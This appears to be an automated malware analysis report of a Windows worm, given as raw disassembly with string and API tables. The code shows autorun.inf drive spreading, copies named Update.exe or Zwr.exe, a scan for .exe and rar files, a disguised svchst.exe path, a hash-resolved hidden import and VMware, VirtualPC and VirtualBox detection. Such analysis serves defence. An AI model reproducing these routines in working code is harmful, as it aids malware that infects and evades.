004135E9 lea eax, dword ptr [ebp-00000400h]
004135EF push eax
004135F0 call 00415EECh
004135F5 add esp, 08h
004135F8 mov ecx, dword ptr [ebp+10h]
004135FB push ecx
004135FC call 00413330h
00413601 add esp, 04h
00413604 lea edx, dword ptr [ebp-00000400h]
0041360A push edx
0041360B call 00413330h
00413610 add esp, 04h
00413613 mov eax, dword ptr [ebp+10h]
00413616 push eax
00413617 call 00415EDCh
0041361C add esp, 04h
0041361F mov dword ptr [ebp-00000204h], eax
00413625 lea ecx, dword ptr [ebp-00000400h]
0041362B push ecx
0041362C call 00415EDCh
00413631 add esp, 04h
00413634 mov dword ptr [ebp-08h], eax
00413637 mov edx, dword ptr [ebp-08h] xrefs 0041367E
0041363A cmp edx, dword ptr [ebp-00000204h]
00413640 jc 00413680h
00413642 mov eax, dword ptr [ebp-00000204h]
00413648 push eax
00413649 lea ecx, dword ptr [ebp-00000400h]
0041364F push ecx
00413650 mov edx, dword ptr [ebp+10h]
00413653 push edx
00413654 call 00415EABh
00413659 add esp, 0Ch
0041365C test eax, eax
0041365E jne 00413666h
00413660 mov al, 01h
00413662 jmp 0041368Fh
00413666 lea eax, dword ptr [ebp-00000400h] xrefs 0041365E
0041366C push eax
0041366D call 004132E0h
00413672 add esp, 04h
00413675 mov ecx, dword ptr [ebp-08h]
00413678 sub ecx, 01h
0041367B mov dword ptr [ebp-08h], ecx
0041367E jmp 00413637h xrefs 00413664
00413680 cmp dword ptr [ebp-00000408h], 02h xrefs 004135D3, 00413640
00413687 jne 0041368Dh
00413689 xor al, al
0041368B jmp 0041368Fh
0041368D xor al, al xrefs 0041359C, 00413687
0041368F mov esp, ebp xrefs 0041368B, 00413662
00413691 pop ebp
00413692 ret function end
Strings
  • \Upd.exe, va: 00411A9C
  • \Zwr.exe, va: 00411A44
  • [autorun]open=Zwr.exe, va: 00411A50
  • \autorun.inf, va: 00411A6C
  • \autorun.inf, va: 00411A7C
  • \autorun.inf, va: 00411A8C
  • \Update.exe, va: 004119E8
  • [autorun]open=Update.exe, va: 004119F4
  • \autorun.inf, va: 00411A14
  • \autorun.inf, va: 00411A24
  • \autorun.inf, va: 00411A34
Address Instruction Meta Information
004153C0 push ebp
004153C1 mov ebp, esp
004153C3 sub esp, 000000BCh
004153C9 push esi
004153CA push edi
004153CB mov eax, 00000001h xrefs 004156C4
004153D0 test eax, eax
004153D2 je 004156C9h
004153D8 push 0001D4C0h
004153DD call 00414180h
004153E2 mov dword ptr [ebp-04h], 00000000h
004153E9 jmp 004153F4h
004153F4 cmp dword ptr [ebp-04h], 18h xrefs 004153E9
004153F8 jnl 004156C4h
004153FE mov edx, dword ptr [ebp-04h]
00415401 mov eax, dword ptr [004010B0h+edx*4]
00415408 push eax
00415409 call 00414270h
0041540E cmp eax, 02h
00415411 jne 004154F5h
00415417 mov ecx, dword ptr [004119E8h] ASCII "\Update.exe"
0041541D mov dword ptr [ebp-28h], ecx
00415420 mov edx, dword ptr [004119ECh] 2E657461
00415426 mov dword ptr [ebp-24h], edx
00415429 mov eax, dword ptr [004119F0h] 00657865
0041542E mov dword ptr [ebp-20h], eax
00415431 xor ecx, ecx
00415433 mov dword ptr [ebp-1Ch], ecx
00415436 mov dword ptr [ebp-18h], ecx
00415439 mov dword ptr [ebp-14h], ecx
0041543C mov dword ptr [ebp-10h], ecx
0041543F mov word ptr [ebp-0Ch], cx
00415443 mov ecx, 00000006h
00415448 mov esi, 004119F4h ASCII "[autorun]open=Update.exe"
0041544D lea edi, dword ptr [ebp-5Ch]
00415450 rep movsd
00415452 movsw
00415454 movsb
00415455 xor edx, edx
00415457 mov dword ptr [ebp-41h], edx
0041545A mov dword ptr [ebp-3Dh], edx
0041545D mov dword ptr [ebp-39h], edx
00415460 mov dword ptr [ebp-35h], edx
00415463 mov dword ptr [ebp-31h], edx
00415466 mov word ptr [ebp-2Dh], dx
0041546A mov byte ptr [ebp-2Bh], dl
0041546D push 00411A10h
00415472 push 00411A14h ASCII "\autorun.inf"
00415477 call 004160ABh
0041547C add esp, 08h
0041547F mov dword ptr [ebp-08h], eax
00415482 lea eax, dword ptr [ebp-5Ch]
00415485 push eax
00415486 mov ecx, dword ptr [ebp-08h]
00415489 push ecx
0041548A call 004160BEh
0041548F add esp, 08h
00415492 mov edx, dword ptr [ebp-08h]
00415495 push edx
00415496 call 004160F5h
0041549B add esp, 04h
0041549E push 00000001h
004154A0 mov eax, dword ptr [ebp-04h]
004154A3 mov ecx, dword ptr [004010B0h+eax*4]
004154AA push ecx
004154AB push 00411A24h ASCII "\autorun.inf"
004154B0 call 004156E0h
004154B5 push 00411A34h ASCII "\autorun.inf"
004154BA call 0041609Bh
004154BF add esp, 04h
004154C2 lea edx, dword ptr [ebp-28h]
004154C5 push edx
004154C6 mov eax, dword ptr [ebp-04h]
004154C9 mov ecx, dword ptr [004010B0h+eax*4]
004154D0 push ecx
004154D1 call 00416005h
004154D6 add esp, 08h
004154D9 push 00000001h
004154DB mov edx, dword ptr [ebp-04h]
004154DE mov eax, dword ptr [004010B0h+edx*4]
004154E5 push eax
004154E6 push 004168F0h
004154EB call 004156E0h
004154F0 jmp 004156BFh
004154F5 mov ecx, dword ptr [ebp-04h] xrefs 00415411
004154F8 mov edx, dword ptr [004010B0h+ecx*4]
004154FF push edx
00415500 call 00414270h
00415505 cmp eax, 05h
00415508 jne 0041563Bh
0041550E mov eax, dword ptr [00411A44h] ASCII "\Zwr.exe"
00415513 mov dword ptr [ebp-000000A4h], eax
00415519 mov ecx, dword ptr [00411A48h] 6578652E
0041551F mov dword ptr [ebp-000000A0h], ecx
00415525 mov dl, byte ptr [00411A4Ch] 00
0041552B mov byte ptr [ebp-0000009Ch], dl
00415531 xor eax, eax
00415533 mov dword ptr [ebp-0000009Bh], eax
00415539 mov dword ptr [ebp-00000097h], eax
0041553F mov word ptr [ebp-00000093h], ax
00415546 mov byte ptr [ebp-00000091h], al
0041554C mov ecx, dword ptr [00411A50h] ASCII "[autorun]open=Zwr.exe"
00415552 mov dword ptr [ebp-00000090h], ecx
00415558 mov edx, dword ptr [00411A54h] 6E75726F
0041555E mov dword ptr [ebp-0000008Ch], edx
00415564 mov eax, dword ptr [00411A58h] 6F0A0D5D
00415569 mov dword ptr [ebp-00000088h], eax
0041556F mov ecx, dword ptr [00411A5Ch] 3D6E6570
00415575 mov dword ptr [ebp-00000084h], ecx
0041557B mov edx, dword ptr [00411A60h] 2E72775A
00415581 mov dword ptr [ebp-80h], edx
00415584 mov eax, dword ptr [00411A64h] 00657865
00415589 mov dword ptr [ebp-7Ch], eax
0041558C xor ecx, ecx
0041558E mov dword ptr [ebp-78h], ecx
00415591 mov dword ptr [ebp-74h], ecx
00415594 mov dword ptr [ebp-70h], ecx
00415597 mov dword ptr [ebp-6Ch], ecx
0041559A mov dword ptr [ebp-68h], ecx
0041559D mov dword ptr [ebp-64h], ecx
004155A0 mov word ptr [ebp-60h], cx
004155A4 push 00411A68h
004155A9 push 00411A6Ch ASCII "\autorun.inf"
004155AE call 004160ABh
004155B3 add esp, 08h
004155B6 mov dword ptr [ebp-000000A8h], eax
004155BC lea edx, dword ptr [ebp-00000090h]
004155C2 push edx
004155C3 mov eax, dword ptr [ebp-000000A8h]
004155C9 push eax
004155CA call 004160BEh
004155CF add esp, 08h
004155D2 mov ecx, dword ptr [ebp-000000A8h]
004155D8 push ecx
004155D9 call 004160F5h
004155DE add esp, 04h
004155E1 push 00000001h
004155E3 mov edx, dword ptr [ebp-04h]
004155E6 mov eax, dword ptr [004010B0h+edx*4]
004155ED push eax
004155EE push 00411A7Ch ASCII "\autorun.inf"
004155F3 call 004156E0h
004155F8 push 00411A8Ch ASCII "\autorun.inf"
004155FD call 0041609Bh
00415602 add esp, 04h
00415605 lea ecx, dword ptr [ebp-000000A4h]
0041560B push ecx
0041560C mov edx, dword ptr [ebp-04h]
0041560F mov eax, dword ptr [004010B0h+edx*4]
00415616 push eax
00415617 call 00416005h
0041561C add esp, 08h
0041561F push 00000001h
00415621 mov ecx, dword ptr [ebp-04h]
00415624 mov edx, dword ptr [004010B0h+ecx*4]
0041562B push edx
0041562C push 004168F0h
00415631 call 004156E0h
00415636 jmp 004156BFh
0041563B mov eax, dword ptr [ebp-04h] xrefs 00415508
0041563E mov ecx, dword ptr [004010B0h+eax*4]
00415645 push ecx
00415646 call 00414270h
0041564B cmp eax, 04h
0041564E jne 004156BFh
00415650 mov edx, dword ptr [00411A9Ch] ASCII "\Upd.exe"
00415656 mov dword ptr [ebp-000000BCh], edx
0041565C mov eax, dword ptr [00411AA0h] 6578652E
00415661 mov dword ptr [ebp-000000B8h], eax
00415667 mov cl, byte ptr [00411AA4h] 00
0041566D mov byte ptr [ebp-000000B4h], cl
00415673 xor edx, edx
00415675 mov dword ptr [ebp-000000B3h], edx
0041567B mov dword ptr [ebp-000000AFh], edx
00415681 mov word ptr [ebp-000000ABh], dx
00415688 mov byte ptr [ebp-000000A9h], dl
0041568E lea eax, dword ptr [ebp-000000BCh]
00415694 push eax
00415695 mov ecx, dword ptr [ebp-04h]
00415698 mov edx, dword ptr [004010B0h+ecx*4]
0041569F push edx
004156A0 call 00416005h
004156A5 add esp, 08h
004156A8 push 00000001h
004156AA mov eax, dword ptr [ebp-04h]
004156AD mov ecx, dword ptr [004010B0h+eax*4]
004156B4 push ecx
004156B5 push 004168F0h
004156BA call 004156E0h
004156BF jmp 004153EBh xrefs 0041564E, 00415636, 004154F0 swap point
004156C4 jmp 004153CBh xrefs 004153F8
004156C9 pop edi xrefs 004153D2
004156CA pop esi
004156CB mov esp, ebp
004156CD pop ebp
004156CE retn 0004h function end
Strings
  • %s\*.exe, va: 00411C04
Address Instruction Meta Information
00414630 push ebp xrefs 0041484B, 0041486D, 0041488F
00414631 mov ebp, esp
00414633 sub esp, 0000024Ch
00414639 mov eax, dword ptr [ebp+08h]
0041463C push eax
0041463D push 00411C04h ASCII "%s\*.exe"
00414642 lea ecx, dword ptr [ebp-00000108h]
00414648 push ecx
00414649 call 004141C0h
0041464E add esp, 0Ch
00414651 lea edx, dword ptr [ebp-00000248h]
00414657 push edx
00414658 lea eax, dword ptr [ebp-00000108h]
0041465E push eax
0041465F call 004140F0h
00414664 mov dword ptr [ebp-0000024Ch], eax
0041466A mov ecx, dword ptr [ebp+08h] xrefs 00414692
0041466D push ecx
0041466E lea edx, dword ptr [ebp-0000021Ch]
00414674 push edx
00414675 call 004145F0h
0041467A add esp, 08h
0041467D lea eax, dword ptr [ebp-00000248h]
00414683 push eax
00414684 mov ecx, dword ptr [ebp-0000024Ch]
0041468A push ecx
0041468B call 004141E0h
00414690 test eax, eax
00414692 jne 0041466Ah
00414694 mov esp, ebp
00414696 pop ebp
00414697 ret function end
Strings
  • vmusrvc.exe, va: 00411F10
  • vmsrvc.exe, va: 00411F1C
  • SYSTEM\ControlSet001\Services, va: 00411F28
  • vpcbus, va: 00411F48
  • vpc-s3, va: 00411F50
  • vpcuhub, va: 00411F58
  • msvmmouf, va: 00411F60
Address Instruction Meta Information
004127E0 push ebp xrefs 00414806
004127E1 mov ebp, esp
004127E3 sub esp, 000001E0h
004127E9 push esi
004127EA push edi
004127EB mov eax, dword ptr [00411F10h] ASCII "vmusrvc.exe"
004127F0 mov dword ptr [ebp-000001E0h], eax
004127F6 mov ecx, dword ptr [00411F14h] 2E637672
004127FC mov dword ptr [ebp-000001DCh], ecx
00412802 mov edx, dword ptr [00411F18h] 00657865
00412808 mov dword ptr [ebp-000001D8h], edx
0041280E xor eax, eax
00412810 mov dword ptr [ebp-000001D4h], eax
00412816 mov dword ptr [ebp-000001D0h], eax
0041281C mov ecx, dword ptr [00411F1Ch] ASCII "vmsrvc.exe"
00412822 mov dword ptr [ebp-000001CCh], ecx
00412828 mov edx, dword ptr [00411F20h] 652E6376
0041282E mov dword ptr [ebp-000001C8h], edx
00412834 mov ax, word ptr [00411F24h] 6578
0041283A mov word ptr [ebp-000001C4h], ax
00412841 mov cl, byte ptr [00411F26h] 00
00412847 mov byte ptr [ebp-000001C2h], cl
0041284D xor edx, edx
0041284F mov dword ptr [ebp-000001C1h], edx
00412855 mov dword ptr [ebp-000001BDh], edx
0041285B mov byte ptr [ebp-000001B9h], dl
00412861 xor eax, eax
00412863 mov word ptr [ebp-04h], ax
00412867 jmp 00412875h
00412869 mov cx, word ptr [ebp-04h] xrefs 004128A3
0041286D add cx, 0001h
00412871 mov word ptr [ebp-04h], cx
00412875 movzx edx, word ptr [ebp-04h] xrefs 00412867
00412879 cmp edx, 02h
0041287C jnl 004128A5h
0041287E movzx eax, word ptr [ebp-04h]
00412882 imul eax, eax, 14h
00412885 lea ecx, dword ptr [ebp+eax-000001E0h]
0041288C push ecx
0041288D call 00413380h
00412892 add esp, 04h
00412895 movzx edx, al
00412898 test edx, edx
0041289A je 004128A3h
0041289C mov al, 01h
0041289E jmp 004129A2h
004128A3 jmp 00412869h xrefs 0041289A
004128A5 mov ecx, 00000007h xrefs 0041287C
004128AA mov esi, 00411F28h ASCII "SYSTEM\ControlSet001\Services"
004128AF lea edi, dword ptr [ebp-000001B8h]
004128B5 rep movsd
004128B7 movsw
004128B9 mov eax, dword ptr [00411F48h] ASCII "vpcbus"
004128BE mov dword ptr [ebp-00000198h], eax
004128C4 mov cx, word ptr [00411F4Ch] 7375
004128CB mov word ptr [ebp-00000194h], cx
004128D2 mov dl, byte ptr [00411F4Eh] 00
004128D8 mov byte ptr [ebp-00000192h], dl
004128DE push 0000005Dh
004128E0 push 00000000h
004128E2 lea eax, dword ptr [ebp-00000191h]
004128E8 push eax
004128E9 call 00415F8Fh
004128EE add esp, 0Ch
004128F1 mov ecx, dword ptr [00411F50h] ASCII "vpc-s3"
004128F7 mov dword ptr [ebp-00000134h], ecx
004128FD mov dx, word ptr [00411F54h] 3373
00412904 mov word ptr [ebp-00000130h], dx
0041290B mov al, byte ptr [00411F56h] 00
00412910 mov byte ptr [ebp-0000012Eh], al
00412916 push 0000005Dh
00412918 push 00000000h
0041291A lea ecx, dword ptr [ebp-0000012Dh]
00412920 push ecx
00412921 call 00415F8Fh
00412926 add esp, 0Ch
00412929 mov edx, dword ptr [00411F58h] ASCII "vpcuhub"
0041292F mov dword ptr [ebp-000000D0h], edx
00412935 mov eax, dword ptr [00411F5Ch] 00627568
0041293A mov dword ptr [ebp-000000CCh], eax
00412940 push 0000005Ch
00412942 push 00000000h
00412944 lea ecx, dword ptr [ebp-000000C8h]
0041294A push ecx
0041294B call 00415F8Fh
00412950 add esp, 0Ch
00412953 mov edx, dword ptr [00411F60h] ASCII "msvmmouf"
00412959 mov dword ptr [ebp-6Ch], edx
0041295C mov eax, dword ptr [00411F64h] 66756F6D
00412961 mov dword ptr [ebp-68h], eax
00412964 mov cl, byte ptr [00411F68h] 00
0041296A mov byte ptr [ebp-64h], cl
0041296D push 0000005Bh
0041296F push 00000000h
00412971 lea edx, dword ptr [ebp-63h]
00412974 push edx
00412975 call 00415F8Fh
0041297A add esp, 0Ch
0041297D push 00000004h
0041297F lea eax, dword ptr [ebp-00000198h]
00412985 push eax
00412986 lea ecx, dword ptr [ebp-000001B8h]
0041298C push ecx
0041298D call 00413450h
00412992 add esp, 0Ch
00412995 movzx edx, al
00412998 test edx, edx
0041299A je 004129A0h
0041299C mov al, 01h
0041299E jmp 004129A2h
004129A0 xor al, al xrefs 0041299A
004129A2 pop edi xrefs 0041299E, 0041289E
004129A3 pop esi
004129A4 mov esp, ebp
004129A6 pop ebp
004129A7 ret function end
APIs
  • ExitProcess.KERNEL32, ref: 0041632D
  • ExitProcess.KERNEL32, ref: 0041614F
  • GetCommandLineA.KERNEL32, ref: 0041616A
  • GetStartupInfoA.KERNEL32, ref: 004161B3
  • GetModuleHandleA.KERNEL32, ref: 004161DD
Address Instruction Meta Information
0041611C push ebp
0041611D mov ebp, esp
0041611F sub esp, 44h
00416122 mov eax, dword ptr [00418CE4h] 00000000
00416127 test eax, eax
00416129 je 00416135h
0041612B call eax
0041612D test eax, eax
0041612F jne 00416135h
00416131 push FFFFFFFEh
00416133 jmp 0041614Fh
00416135 push 00000001h xrefs 00416129, 0041612F
00416137 push 00401088h
0041613C push 00401080h
00416141 call 00416334h
00416146 add esp, 0Ch
00416149 test eax, eax
0041614B je 00416155h
0041614D push FFFFFFFDh
0041614F call dword ptr [0040101Ch] ExitProcess@KERNEL32.DLL (Import) xrefs 00416133
00416155 push esi xrefs 0041614B
00416156 push 00000000h
00416158 push 0040107Ch
0041615D push 00401078h
00416162 call 00416334h
00416167 add esp, 0Ch
0041616A call dword ptr [00401020h] GetCommandLineA@KERNEL32.DLL (Import)
00416170 mov esi, eax
00416172 test esi, esi
00416174 jne 0041617Bh
00416176 mov esi, 00411970h
0041617B mov cl, 20h xrefs 00416174
0041617D jmp 00416184h
0041617F cmp al, 20h xrefs 00416188
00416181 jnbe 0041618Eh
00416183 inc esi
00416184 mov al, byte ptr [esi] xrefs 0041617D
00416186 test al, al
00416188 jne 0041617Fh
0041618A cmp al, 20h
0041618C jbe 004161A5h
0041618E mov al, byte ptr [esi] xrefs 00416181
00416190 cmp al, 22h xrefs 0041619C
00416192 jne 00416197h
00416194 xor cl, 00000020h
00416197 inc esi xrefs 00416192
00416198 mov al, byte ptr [esi]
0041619A cmp al, cl
0041619C jnbe 00416190h
0041619E jmp 004161A5h
004161A0 cmp al, cl xrefs 004161A9
004161A2 jnbe 004161ABh
004161A4 inc esi
004161A5 mov al, byte ptr [esi] xrefs 0041619E, 0041618C
004161A7 test al, al
004161A9 jne 004161A0h
004161AB and dword ptr [ebp-18h], 00000000h xrefs 004161A2
004161AF lea eax, dword ptr [ebp-44h]
004161B2 push eax
004161B3 call dword ptr [00401024h] GetStartupInfoA@KERNEL32.DLL (Import)
004161B9 test eax, 0A0D0A0Dh
004161BE sub eax, 54524357h
004161C3 sub eax, 0A0D0A0Dh
004161C8 test byte ptr [ebp-18h], 00000001h
004161CC je 004161D4h
004161CE movzx eax, word ptr [ebp-14h]
004161D2 jmp 004161D7h
004161D4 push 0000000Ah xrefs 004161CC
004161D6 pop eax
004161D7 push eax xrefs 004161D2
004161D8 push esi
004161DB push 00000000h Count = 2
004161DD call dword ptr [00401028h] GetModuleHandleA@KERNEL32.DLL (Import)
004161E3 push eax
004161E4 call 004147E0h
004161E9 push eax
004161EA call 004162FFh
004161EF pop ecx
004161F0 pop esi
004161F1 leave
004161F2 ret function end
Strings
  • z:\, va: 00411D9C
Address Instruction Meta Information
00413ED0 push ebp
00413ED1 mov ebp, esp
00413ED3 sub esp, 08h
00413ED6 mov eax, dword ptr [00411D9Ch] ASCII "z:\"
00413EDB mov dword ptr [ebp-04h], eax
00413EDE push 00000104h
00413EE3 push 004163E8h
00413EE8 push 00000000h
00413EEA call 00414220h
00413EEF test eax, eax
00413EF1 jne 00413EFAh
00413EF3 push 00000000h
00413EF5 call 00414250h
00413EFA lea ecx, dword ptr [ebp-04h] xrefs 00413EF1, 00413F34
00413EFD push ecx
00413EFE call 00414270h
00413F03 mov dword ptr [ebp-08h], eax
00413F06 cmp dword ptr [ebp-08h], 03h
00413F0A je 00413F12h
00413F0C cmp dword ptr [ebp-08h], 04h
00413F10 jne 00413F25h
00413F12 lea edx, dword ptr [ebp-04h] xrefs 00413F0A
00413F15 push edx
00413F16 call 00414110h
00413F1B cmp eax, 01h
00413F1E jne 00413F25h
00413F20 call 00413D50h
00413F25 mov al, byte ptr [ebp-04h] xrefs 00413F1E, 00413F10
00413F28 sub al, 01h
00413F2A mov byte ptr [ebp-04h], al
00413F2D movsx ecx, byte ptr [ebp-04h]
00413F31 cmp ecx, 62h
00413F34 jne 00413EFAh
00413F36 mov eax, 00000001h
00413F3B mov esp, ebp
00413F3D pop ebp
00413F3E retn 0004h function end
APIs
  • SwitchToThread.KERNEL32, ref: 00415E55
  • Process32First.KERNEL32, ref: 004136DA
Address Instruction Meta Information
004136C0 push ebp xrefs 004133DF
004136C1 mov ebp, esp
004136C3 mov eax, dword ptr [ebp+0Ch]
004136C6 push eax
004136C7 mov ecx, dword ptr [ebp+08h]
004136CA push ecx
004136CB push 6B5366BEh
004136D0 push 19F78C90h
004136D5 call 00415E40h
004136DA call eax Process32First@KERNEL32.DLL (Hidden Import)
004136DC pop ebp
004136DD retn 0008h function end
Strings
  • *.*, va: 00411D90
  • rar, va: 00411D98
  • C:\WINDOWS\svchst.exe, va: 004163E8
Address Instruction Meta Information
00413D50 push ebp xrefs 00413F20, 00413DB0
00413D51 mov ebp, esp
00413D53 sub esp, 00000358h
00413D59 mov dword ptr [ebp-08h], 00000000h
00413D60 lea eax, dword ptr [ebp-00000250h]
00413D66 push eax
00413D67 push 00411D90h ASCII "*.*"
00413D6C call 004140F0h
00413D71 mov dword ptr [ebp-04h], eax
00413D74 cmp dword ptr [ebp-04h], FFFFFFFFh
00413D78 je 00413ECAh
00413D7E movsx ecx, byte ptr [ebp-00000224h] xrefs 00413EBB
00413D85 cmp ecx, 2Eh
00413D88 je 00413EA9h
00413D8E mov edx, dword ptr [ebp-00000250h]
00413D94 and edx, 10h
00413D97 mov dword ptr [ebp-00000250h], edx
00413D9D je 00413DC4h
00413D9F lea eax, dword ptr [ebp-00000224h]
00413DA5 push eax
00413DA6 call 00414110h
00413DAB cmp eax, 01h
00413DAE jne 00413DBFh
00413DB0 call 00413D50h
00413DB5 push 00411D94h
00413DBA call 00414110h
00413DBF jmp 00413EA9h xrefs 00413DAE
00413DC4 lea ecx, dword ptr [ebp-08h] xrefs 00413D9D
00413DC7 push ecx
00413DC8 lea edx, dword ptr [ebp-00000110h]
00413DCE push edx
00413DCF push 00000104h
00413DD4 lea eax, dword ptr [ebp-00000224h]
00413DDA push eax
00413DDB call 00414130h
00413DE0 test eax, eax
00413DE2 je 00413EA9h
00413DE8 lea ecx, dword ptr [ebp-00000110h]
00413DEE push ecx
00413DEF call 00414160h
00413DF4 push 00000003h
00413DF6 push 00411D98h ASCII "rar"
00413DFB lea edx, dword ptr [ebp-00000110h]
00413E01 push edx
00413E02 call 004140B0h
00413E07 lea eax, dword ptr [ebp+eax-00000113h]
00413E0E push eax
00413E0F call 00415F55h
00413E14 add esp, 0Ch
00413E17 test eax, eax
00413E19 jne 00413EA9h
00413E1F push 00001388h
00413E24 call 00414180h
00413E29 call 004141A0h
00413E2E push eax
00413E2F call 00415FC2h
00413E34 add esp, 04h
00413E37 push 00411928h
00413E3C call 00413800h
00413E41 add esp, 04h
00413E44 mov ecx, dword ptr [00411928h+eax*4]
00413E4B mov dword ptr [ebp-00000358h], ecx
00413E51 call 004141A0h
00413E56 push eax
00413E57 call 00415FC2h
00413E5C add esp, 04h
00413E5F call 00415FCCh
00413E64 xor edx, edx
00413E66 mov ecx, 00000004h
00413E6B div ecx
00413E6D mov dword ptr [ebp-00000354h], edx
00413E73 mov edx, dword ptr [ebp-00000358h]
00413E79 push edx
00413E7A lea eax, dword ptr [ebp-00000350h]
00413E80 push eax
00413E81 call 004141C0h
00413E86 add esp, 08h
00413E89 push 00000080h
00413E8E lea ecx, dword ptr [ebp-00000350h]
00413E94 push ecx
00413E95 push 004163E8h ASCII "C:\WINDOWS\svchst.exe"
00413E9A lea edx, dword ptr [ebp-00000110h]
00413EA0 push edx
00413EA1 call 004138F0h
00413EA6 add esp, 10h
00413EA9 lea eax, dword ptr [ebp-00000250h] xrefs 00413D88, 00413DE2, 00413E19, 00413DBF
00413EAF push eax
00413EB0 mov ecx, dword ptr [ebp-04h]
00413EB3 push ecx
00413EB4 call 004141E0h
00413EB9 test eax, eax
00413EBB jne 00413D7Eh
00413EC1 mov edx, dword ptr [ebp-04h]
00413EC4 push edx
00413EC5 call 00414200h
00413ECA mov esp, ebp xrefs 00413D78
00413ECC pop ebp
00413ECD ret function end
Address Instruction Meta Information
00413450 push ebp xrefs 00412516, 00412742, 0041298D, 00412E52, 00412E16, 004132BE, 00413299
00413451 mov ebp, esp
00413453 sub esp, 00000118h
00413459 lea eax, dword ptr [ebp-04h]
0041345C push eax
0041345D push 00000008h
0041345F push 00000000h
00413461 mov ecx, dword ptr [ebp+08h]
00413464 push ecx
00413465 push 80000002h
0041346A call 00413720h
0041346F test eax, eax
00413471 jne 00413551h
00413477 mov dword ptr [ebp-08h], 00000000h
0041347E jmp 00413489h
00413480 mov edx, dword ptr [ebp-08h] xrefs 0041354C
00413483 add edx, 01h
00413486 mov dword ptr [ebp-08h], edx
00413489 mov eax, 00000001h xrefs 0041347E
0041348E test eax, eax
00413490 je 00413551h
00413496 mov dword ptr [ebp-00000118h], 000000FFh
004134A6 push 00000000h Count = 4
004134A8 lea ecx, dword ptr [ebp-00000118h]
004134AE push ecx
004134AF lea edx, dword ptr [ebp-00000110h]
004134B5 push edx
004134B6 mov eax, dword ptr [ebp-08h]
004134B9 push eax
004134BA mov ecx, dword ptr [ebp-04h]
004134BD push ecx
004134BE call 00413750h
004134C3 mov dword ptr [ebp-0Ch], eax
004134C6 mov byte ptr [ebp-11h], 00000000h
004134CA cmp dword ptr [ebp-0Ch], 00000000h
004134CE jne 00413536h
004134D0 mov dword ptr [ebp-00000114h], 00000000h
004134DA jmp 004134EBh
004134DC mov edx, dword ptr [ebp-00000114h] xrefs 00413532
004134E2 add edx, 01h
004134E5 mov dword ptr [ebp-00000114h], edx
004134EB movzx eax, word ptr [ebp+10h] xrefs 004134DA
004134EF cmp dword ptr [ebp-00000114h], eax
004134F5 jnc 00413534h
004134F7 mov ecx, dword ptr [ebp-00000114h]
004134FD imul ecx, ecx, 64h
00413500 add ecx, dword ptr [ebp+0Ch]
00413503 je 00413532h
00413505 lea edx, dword ptr [ebp-00000110h]
0041350B push edx
0041350C mov eax, dword ptr [ebp-00000114h]
00413512 imul eax, eax, 64h
00413515 add eax, dword ptr [ebp+0Ch]
00413518 push eax
00413519 call 00415F11h
0041351E add esp, 08h
00413521 test eax, eax
00413523 jne 00413532h
00413525 mov ecx, dword ptr [ebp-04h]
00413528 push ecx
00413529 call 00413790h
0041352E mov al, 01h
00413530 jmp 0041355Ch
00413532 jmp 004134DCh xrefs 00413503, 00413523
00413534 jmp 0041354Ch xrefs 004134F5
00413536 cmp dword ptr [ebp-0Ch], 00000103h xrefs 004134CE
0041353D jne 0041354Ch
0041353F mov edx, dword ptr [ebp-04h]
00413542 push edx
00413543 call 00413790h
00413548 xor al, al
0041354A jmp 0041355Ch
0041354C jmp 00413480h xrefs 0041353D, 00413534
00413551 mov eax, dword ptr [ebp-04h] xrefs 00413471, 00413490
00413554 push eax
00413555 call 00413790h
0041355A xor al, al
0041355C mov esp, ebp xrefs 00413530, 0041354A
0041355E pop ebp
0041355F ret function end
Strings
  • vboxservice.exe, va: 00411F6C
  • vboxtray.exe, va: 00411F7C
  • HARDWARE\ACPI\DSDT, va: 00411F8C
  • HARDWARE\ACPI\FADT, va: 00411FA0
  • HARDWARE\ACPI\RSDT, va: 00411FB4
  • SYSTEM\ControlSet001\Services, va: 00411FC8
  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0, va: 00411FE8
  • HARDWARE\DESCRIPTION\System, va: 00412038
  • VBOX__, va: 00412054
  • VBoxMouse, va: 0041205C
  • VBoxGuest, va: 00412068
  • VBoxService, va: 00412074
  • VBoxSF, va: 00412080
  • Identifier, va: 00412088
  • SystemBiosVersion, va: 00412094
  • VBOX, va: 004120A8
Address Instruction Meta Information
004129B0 push ebp xrefs 00414812
004129B1 mov ebp, esp
004129B3 sub esp, 00000680h
004129B9 push esi
004129BA push edi
004129BB mov eax, dword ptr [00411F6Ch] ASCII "vboxservice.exe"
004129C0 mov dword ptr [ebp-0000067Ch], eax
004129C6 mov ecx, dword ptr [00411F70h] 76726573
004129CC mov dword ptr [ebp-00000678h], ecx
004129D2 mov edx, dword ptr [00411F74h] 2E656369
004129D8 mov dword ptr [ebp-00000674h], edx
004129DE mov eax, dword ptr [00411F78h] 00657865
004129E3 mov dword ptr [ebp-00000670h], eax
004129E9 xor ecx, ecx
004129EB mov dword ptr [ebp-0000066Ch], ecx
004129F1 mov edx, dword ptr [00411F7Ch] ASCII "vboxtray.exe"
004129F7 mov dword ptr [ebp-00000668h], edx
004129FD mov eax, dword ptr [00411F80h] 79617274
00412A02 mov dword ptr [ebp-00000664h], eax
00412A08 mov ecx, dword ptr [00411F84h] 6578652E
00412A0E mov dword ptr [ebp-00000660h], ecx
00412A14 mov dl, byte ptr [00411F88h] 00
00412A1A mov byte ptr [ebp-0000065Ch], dl
00412A20 xor eax, eax
00412A22 mov dword ptr [ebp-0000065Bh], eax
00412A28 mov word ptr [ebp-00000657h], ax
00412A2F mov byte ptr [ebp-00000655h], al
00412A35 mov ecx, dword ptr [00411F8Ch] ASCII "HARDWARE\ACPI\DSDT"
00412A3B mov dword ptr [ebp-00000580h], ecx
00412A41 mov edx, dword ptr [00411F90h] 45524157
00412A47 mov dword ptr [ebp-0000057Ch], edx
00412A4D mov eax, dword ptr [00411F94h] 5043415C
00412A52 mov dword ptr [ebp-00000578h], eax
00412A58 mov ecx, dword ptr [00411F98h] 53445C49
00412A5E mov dword ptr [ebp-00000574h], ecx
00412A64 mov dx, word ptr [00411F9Ch] 5444
00412A6B mov word ptr [ebp-00000570h], dx
00412A72 mov al, byte ptr [00411F9Eh] 00
00412A77 mov byte ptr [ebp-0000056Eh], al
00412A7D push 00000051h
00412A7F push 00000000h
00412A81 lea ecx, dword ptr [ebp-0000056Dh]
00412A87 push ecx
00412A88 call 00415F8Fh
00412A8D add esp, 0Ch
00412A90 mov edx, dword ptr [00411FA0h] ASCII "HARDWARE\ACPI\FADT"
00412A96 mov dword ptr [ebp-0000051Ch], edx
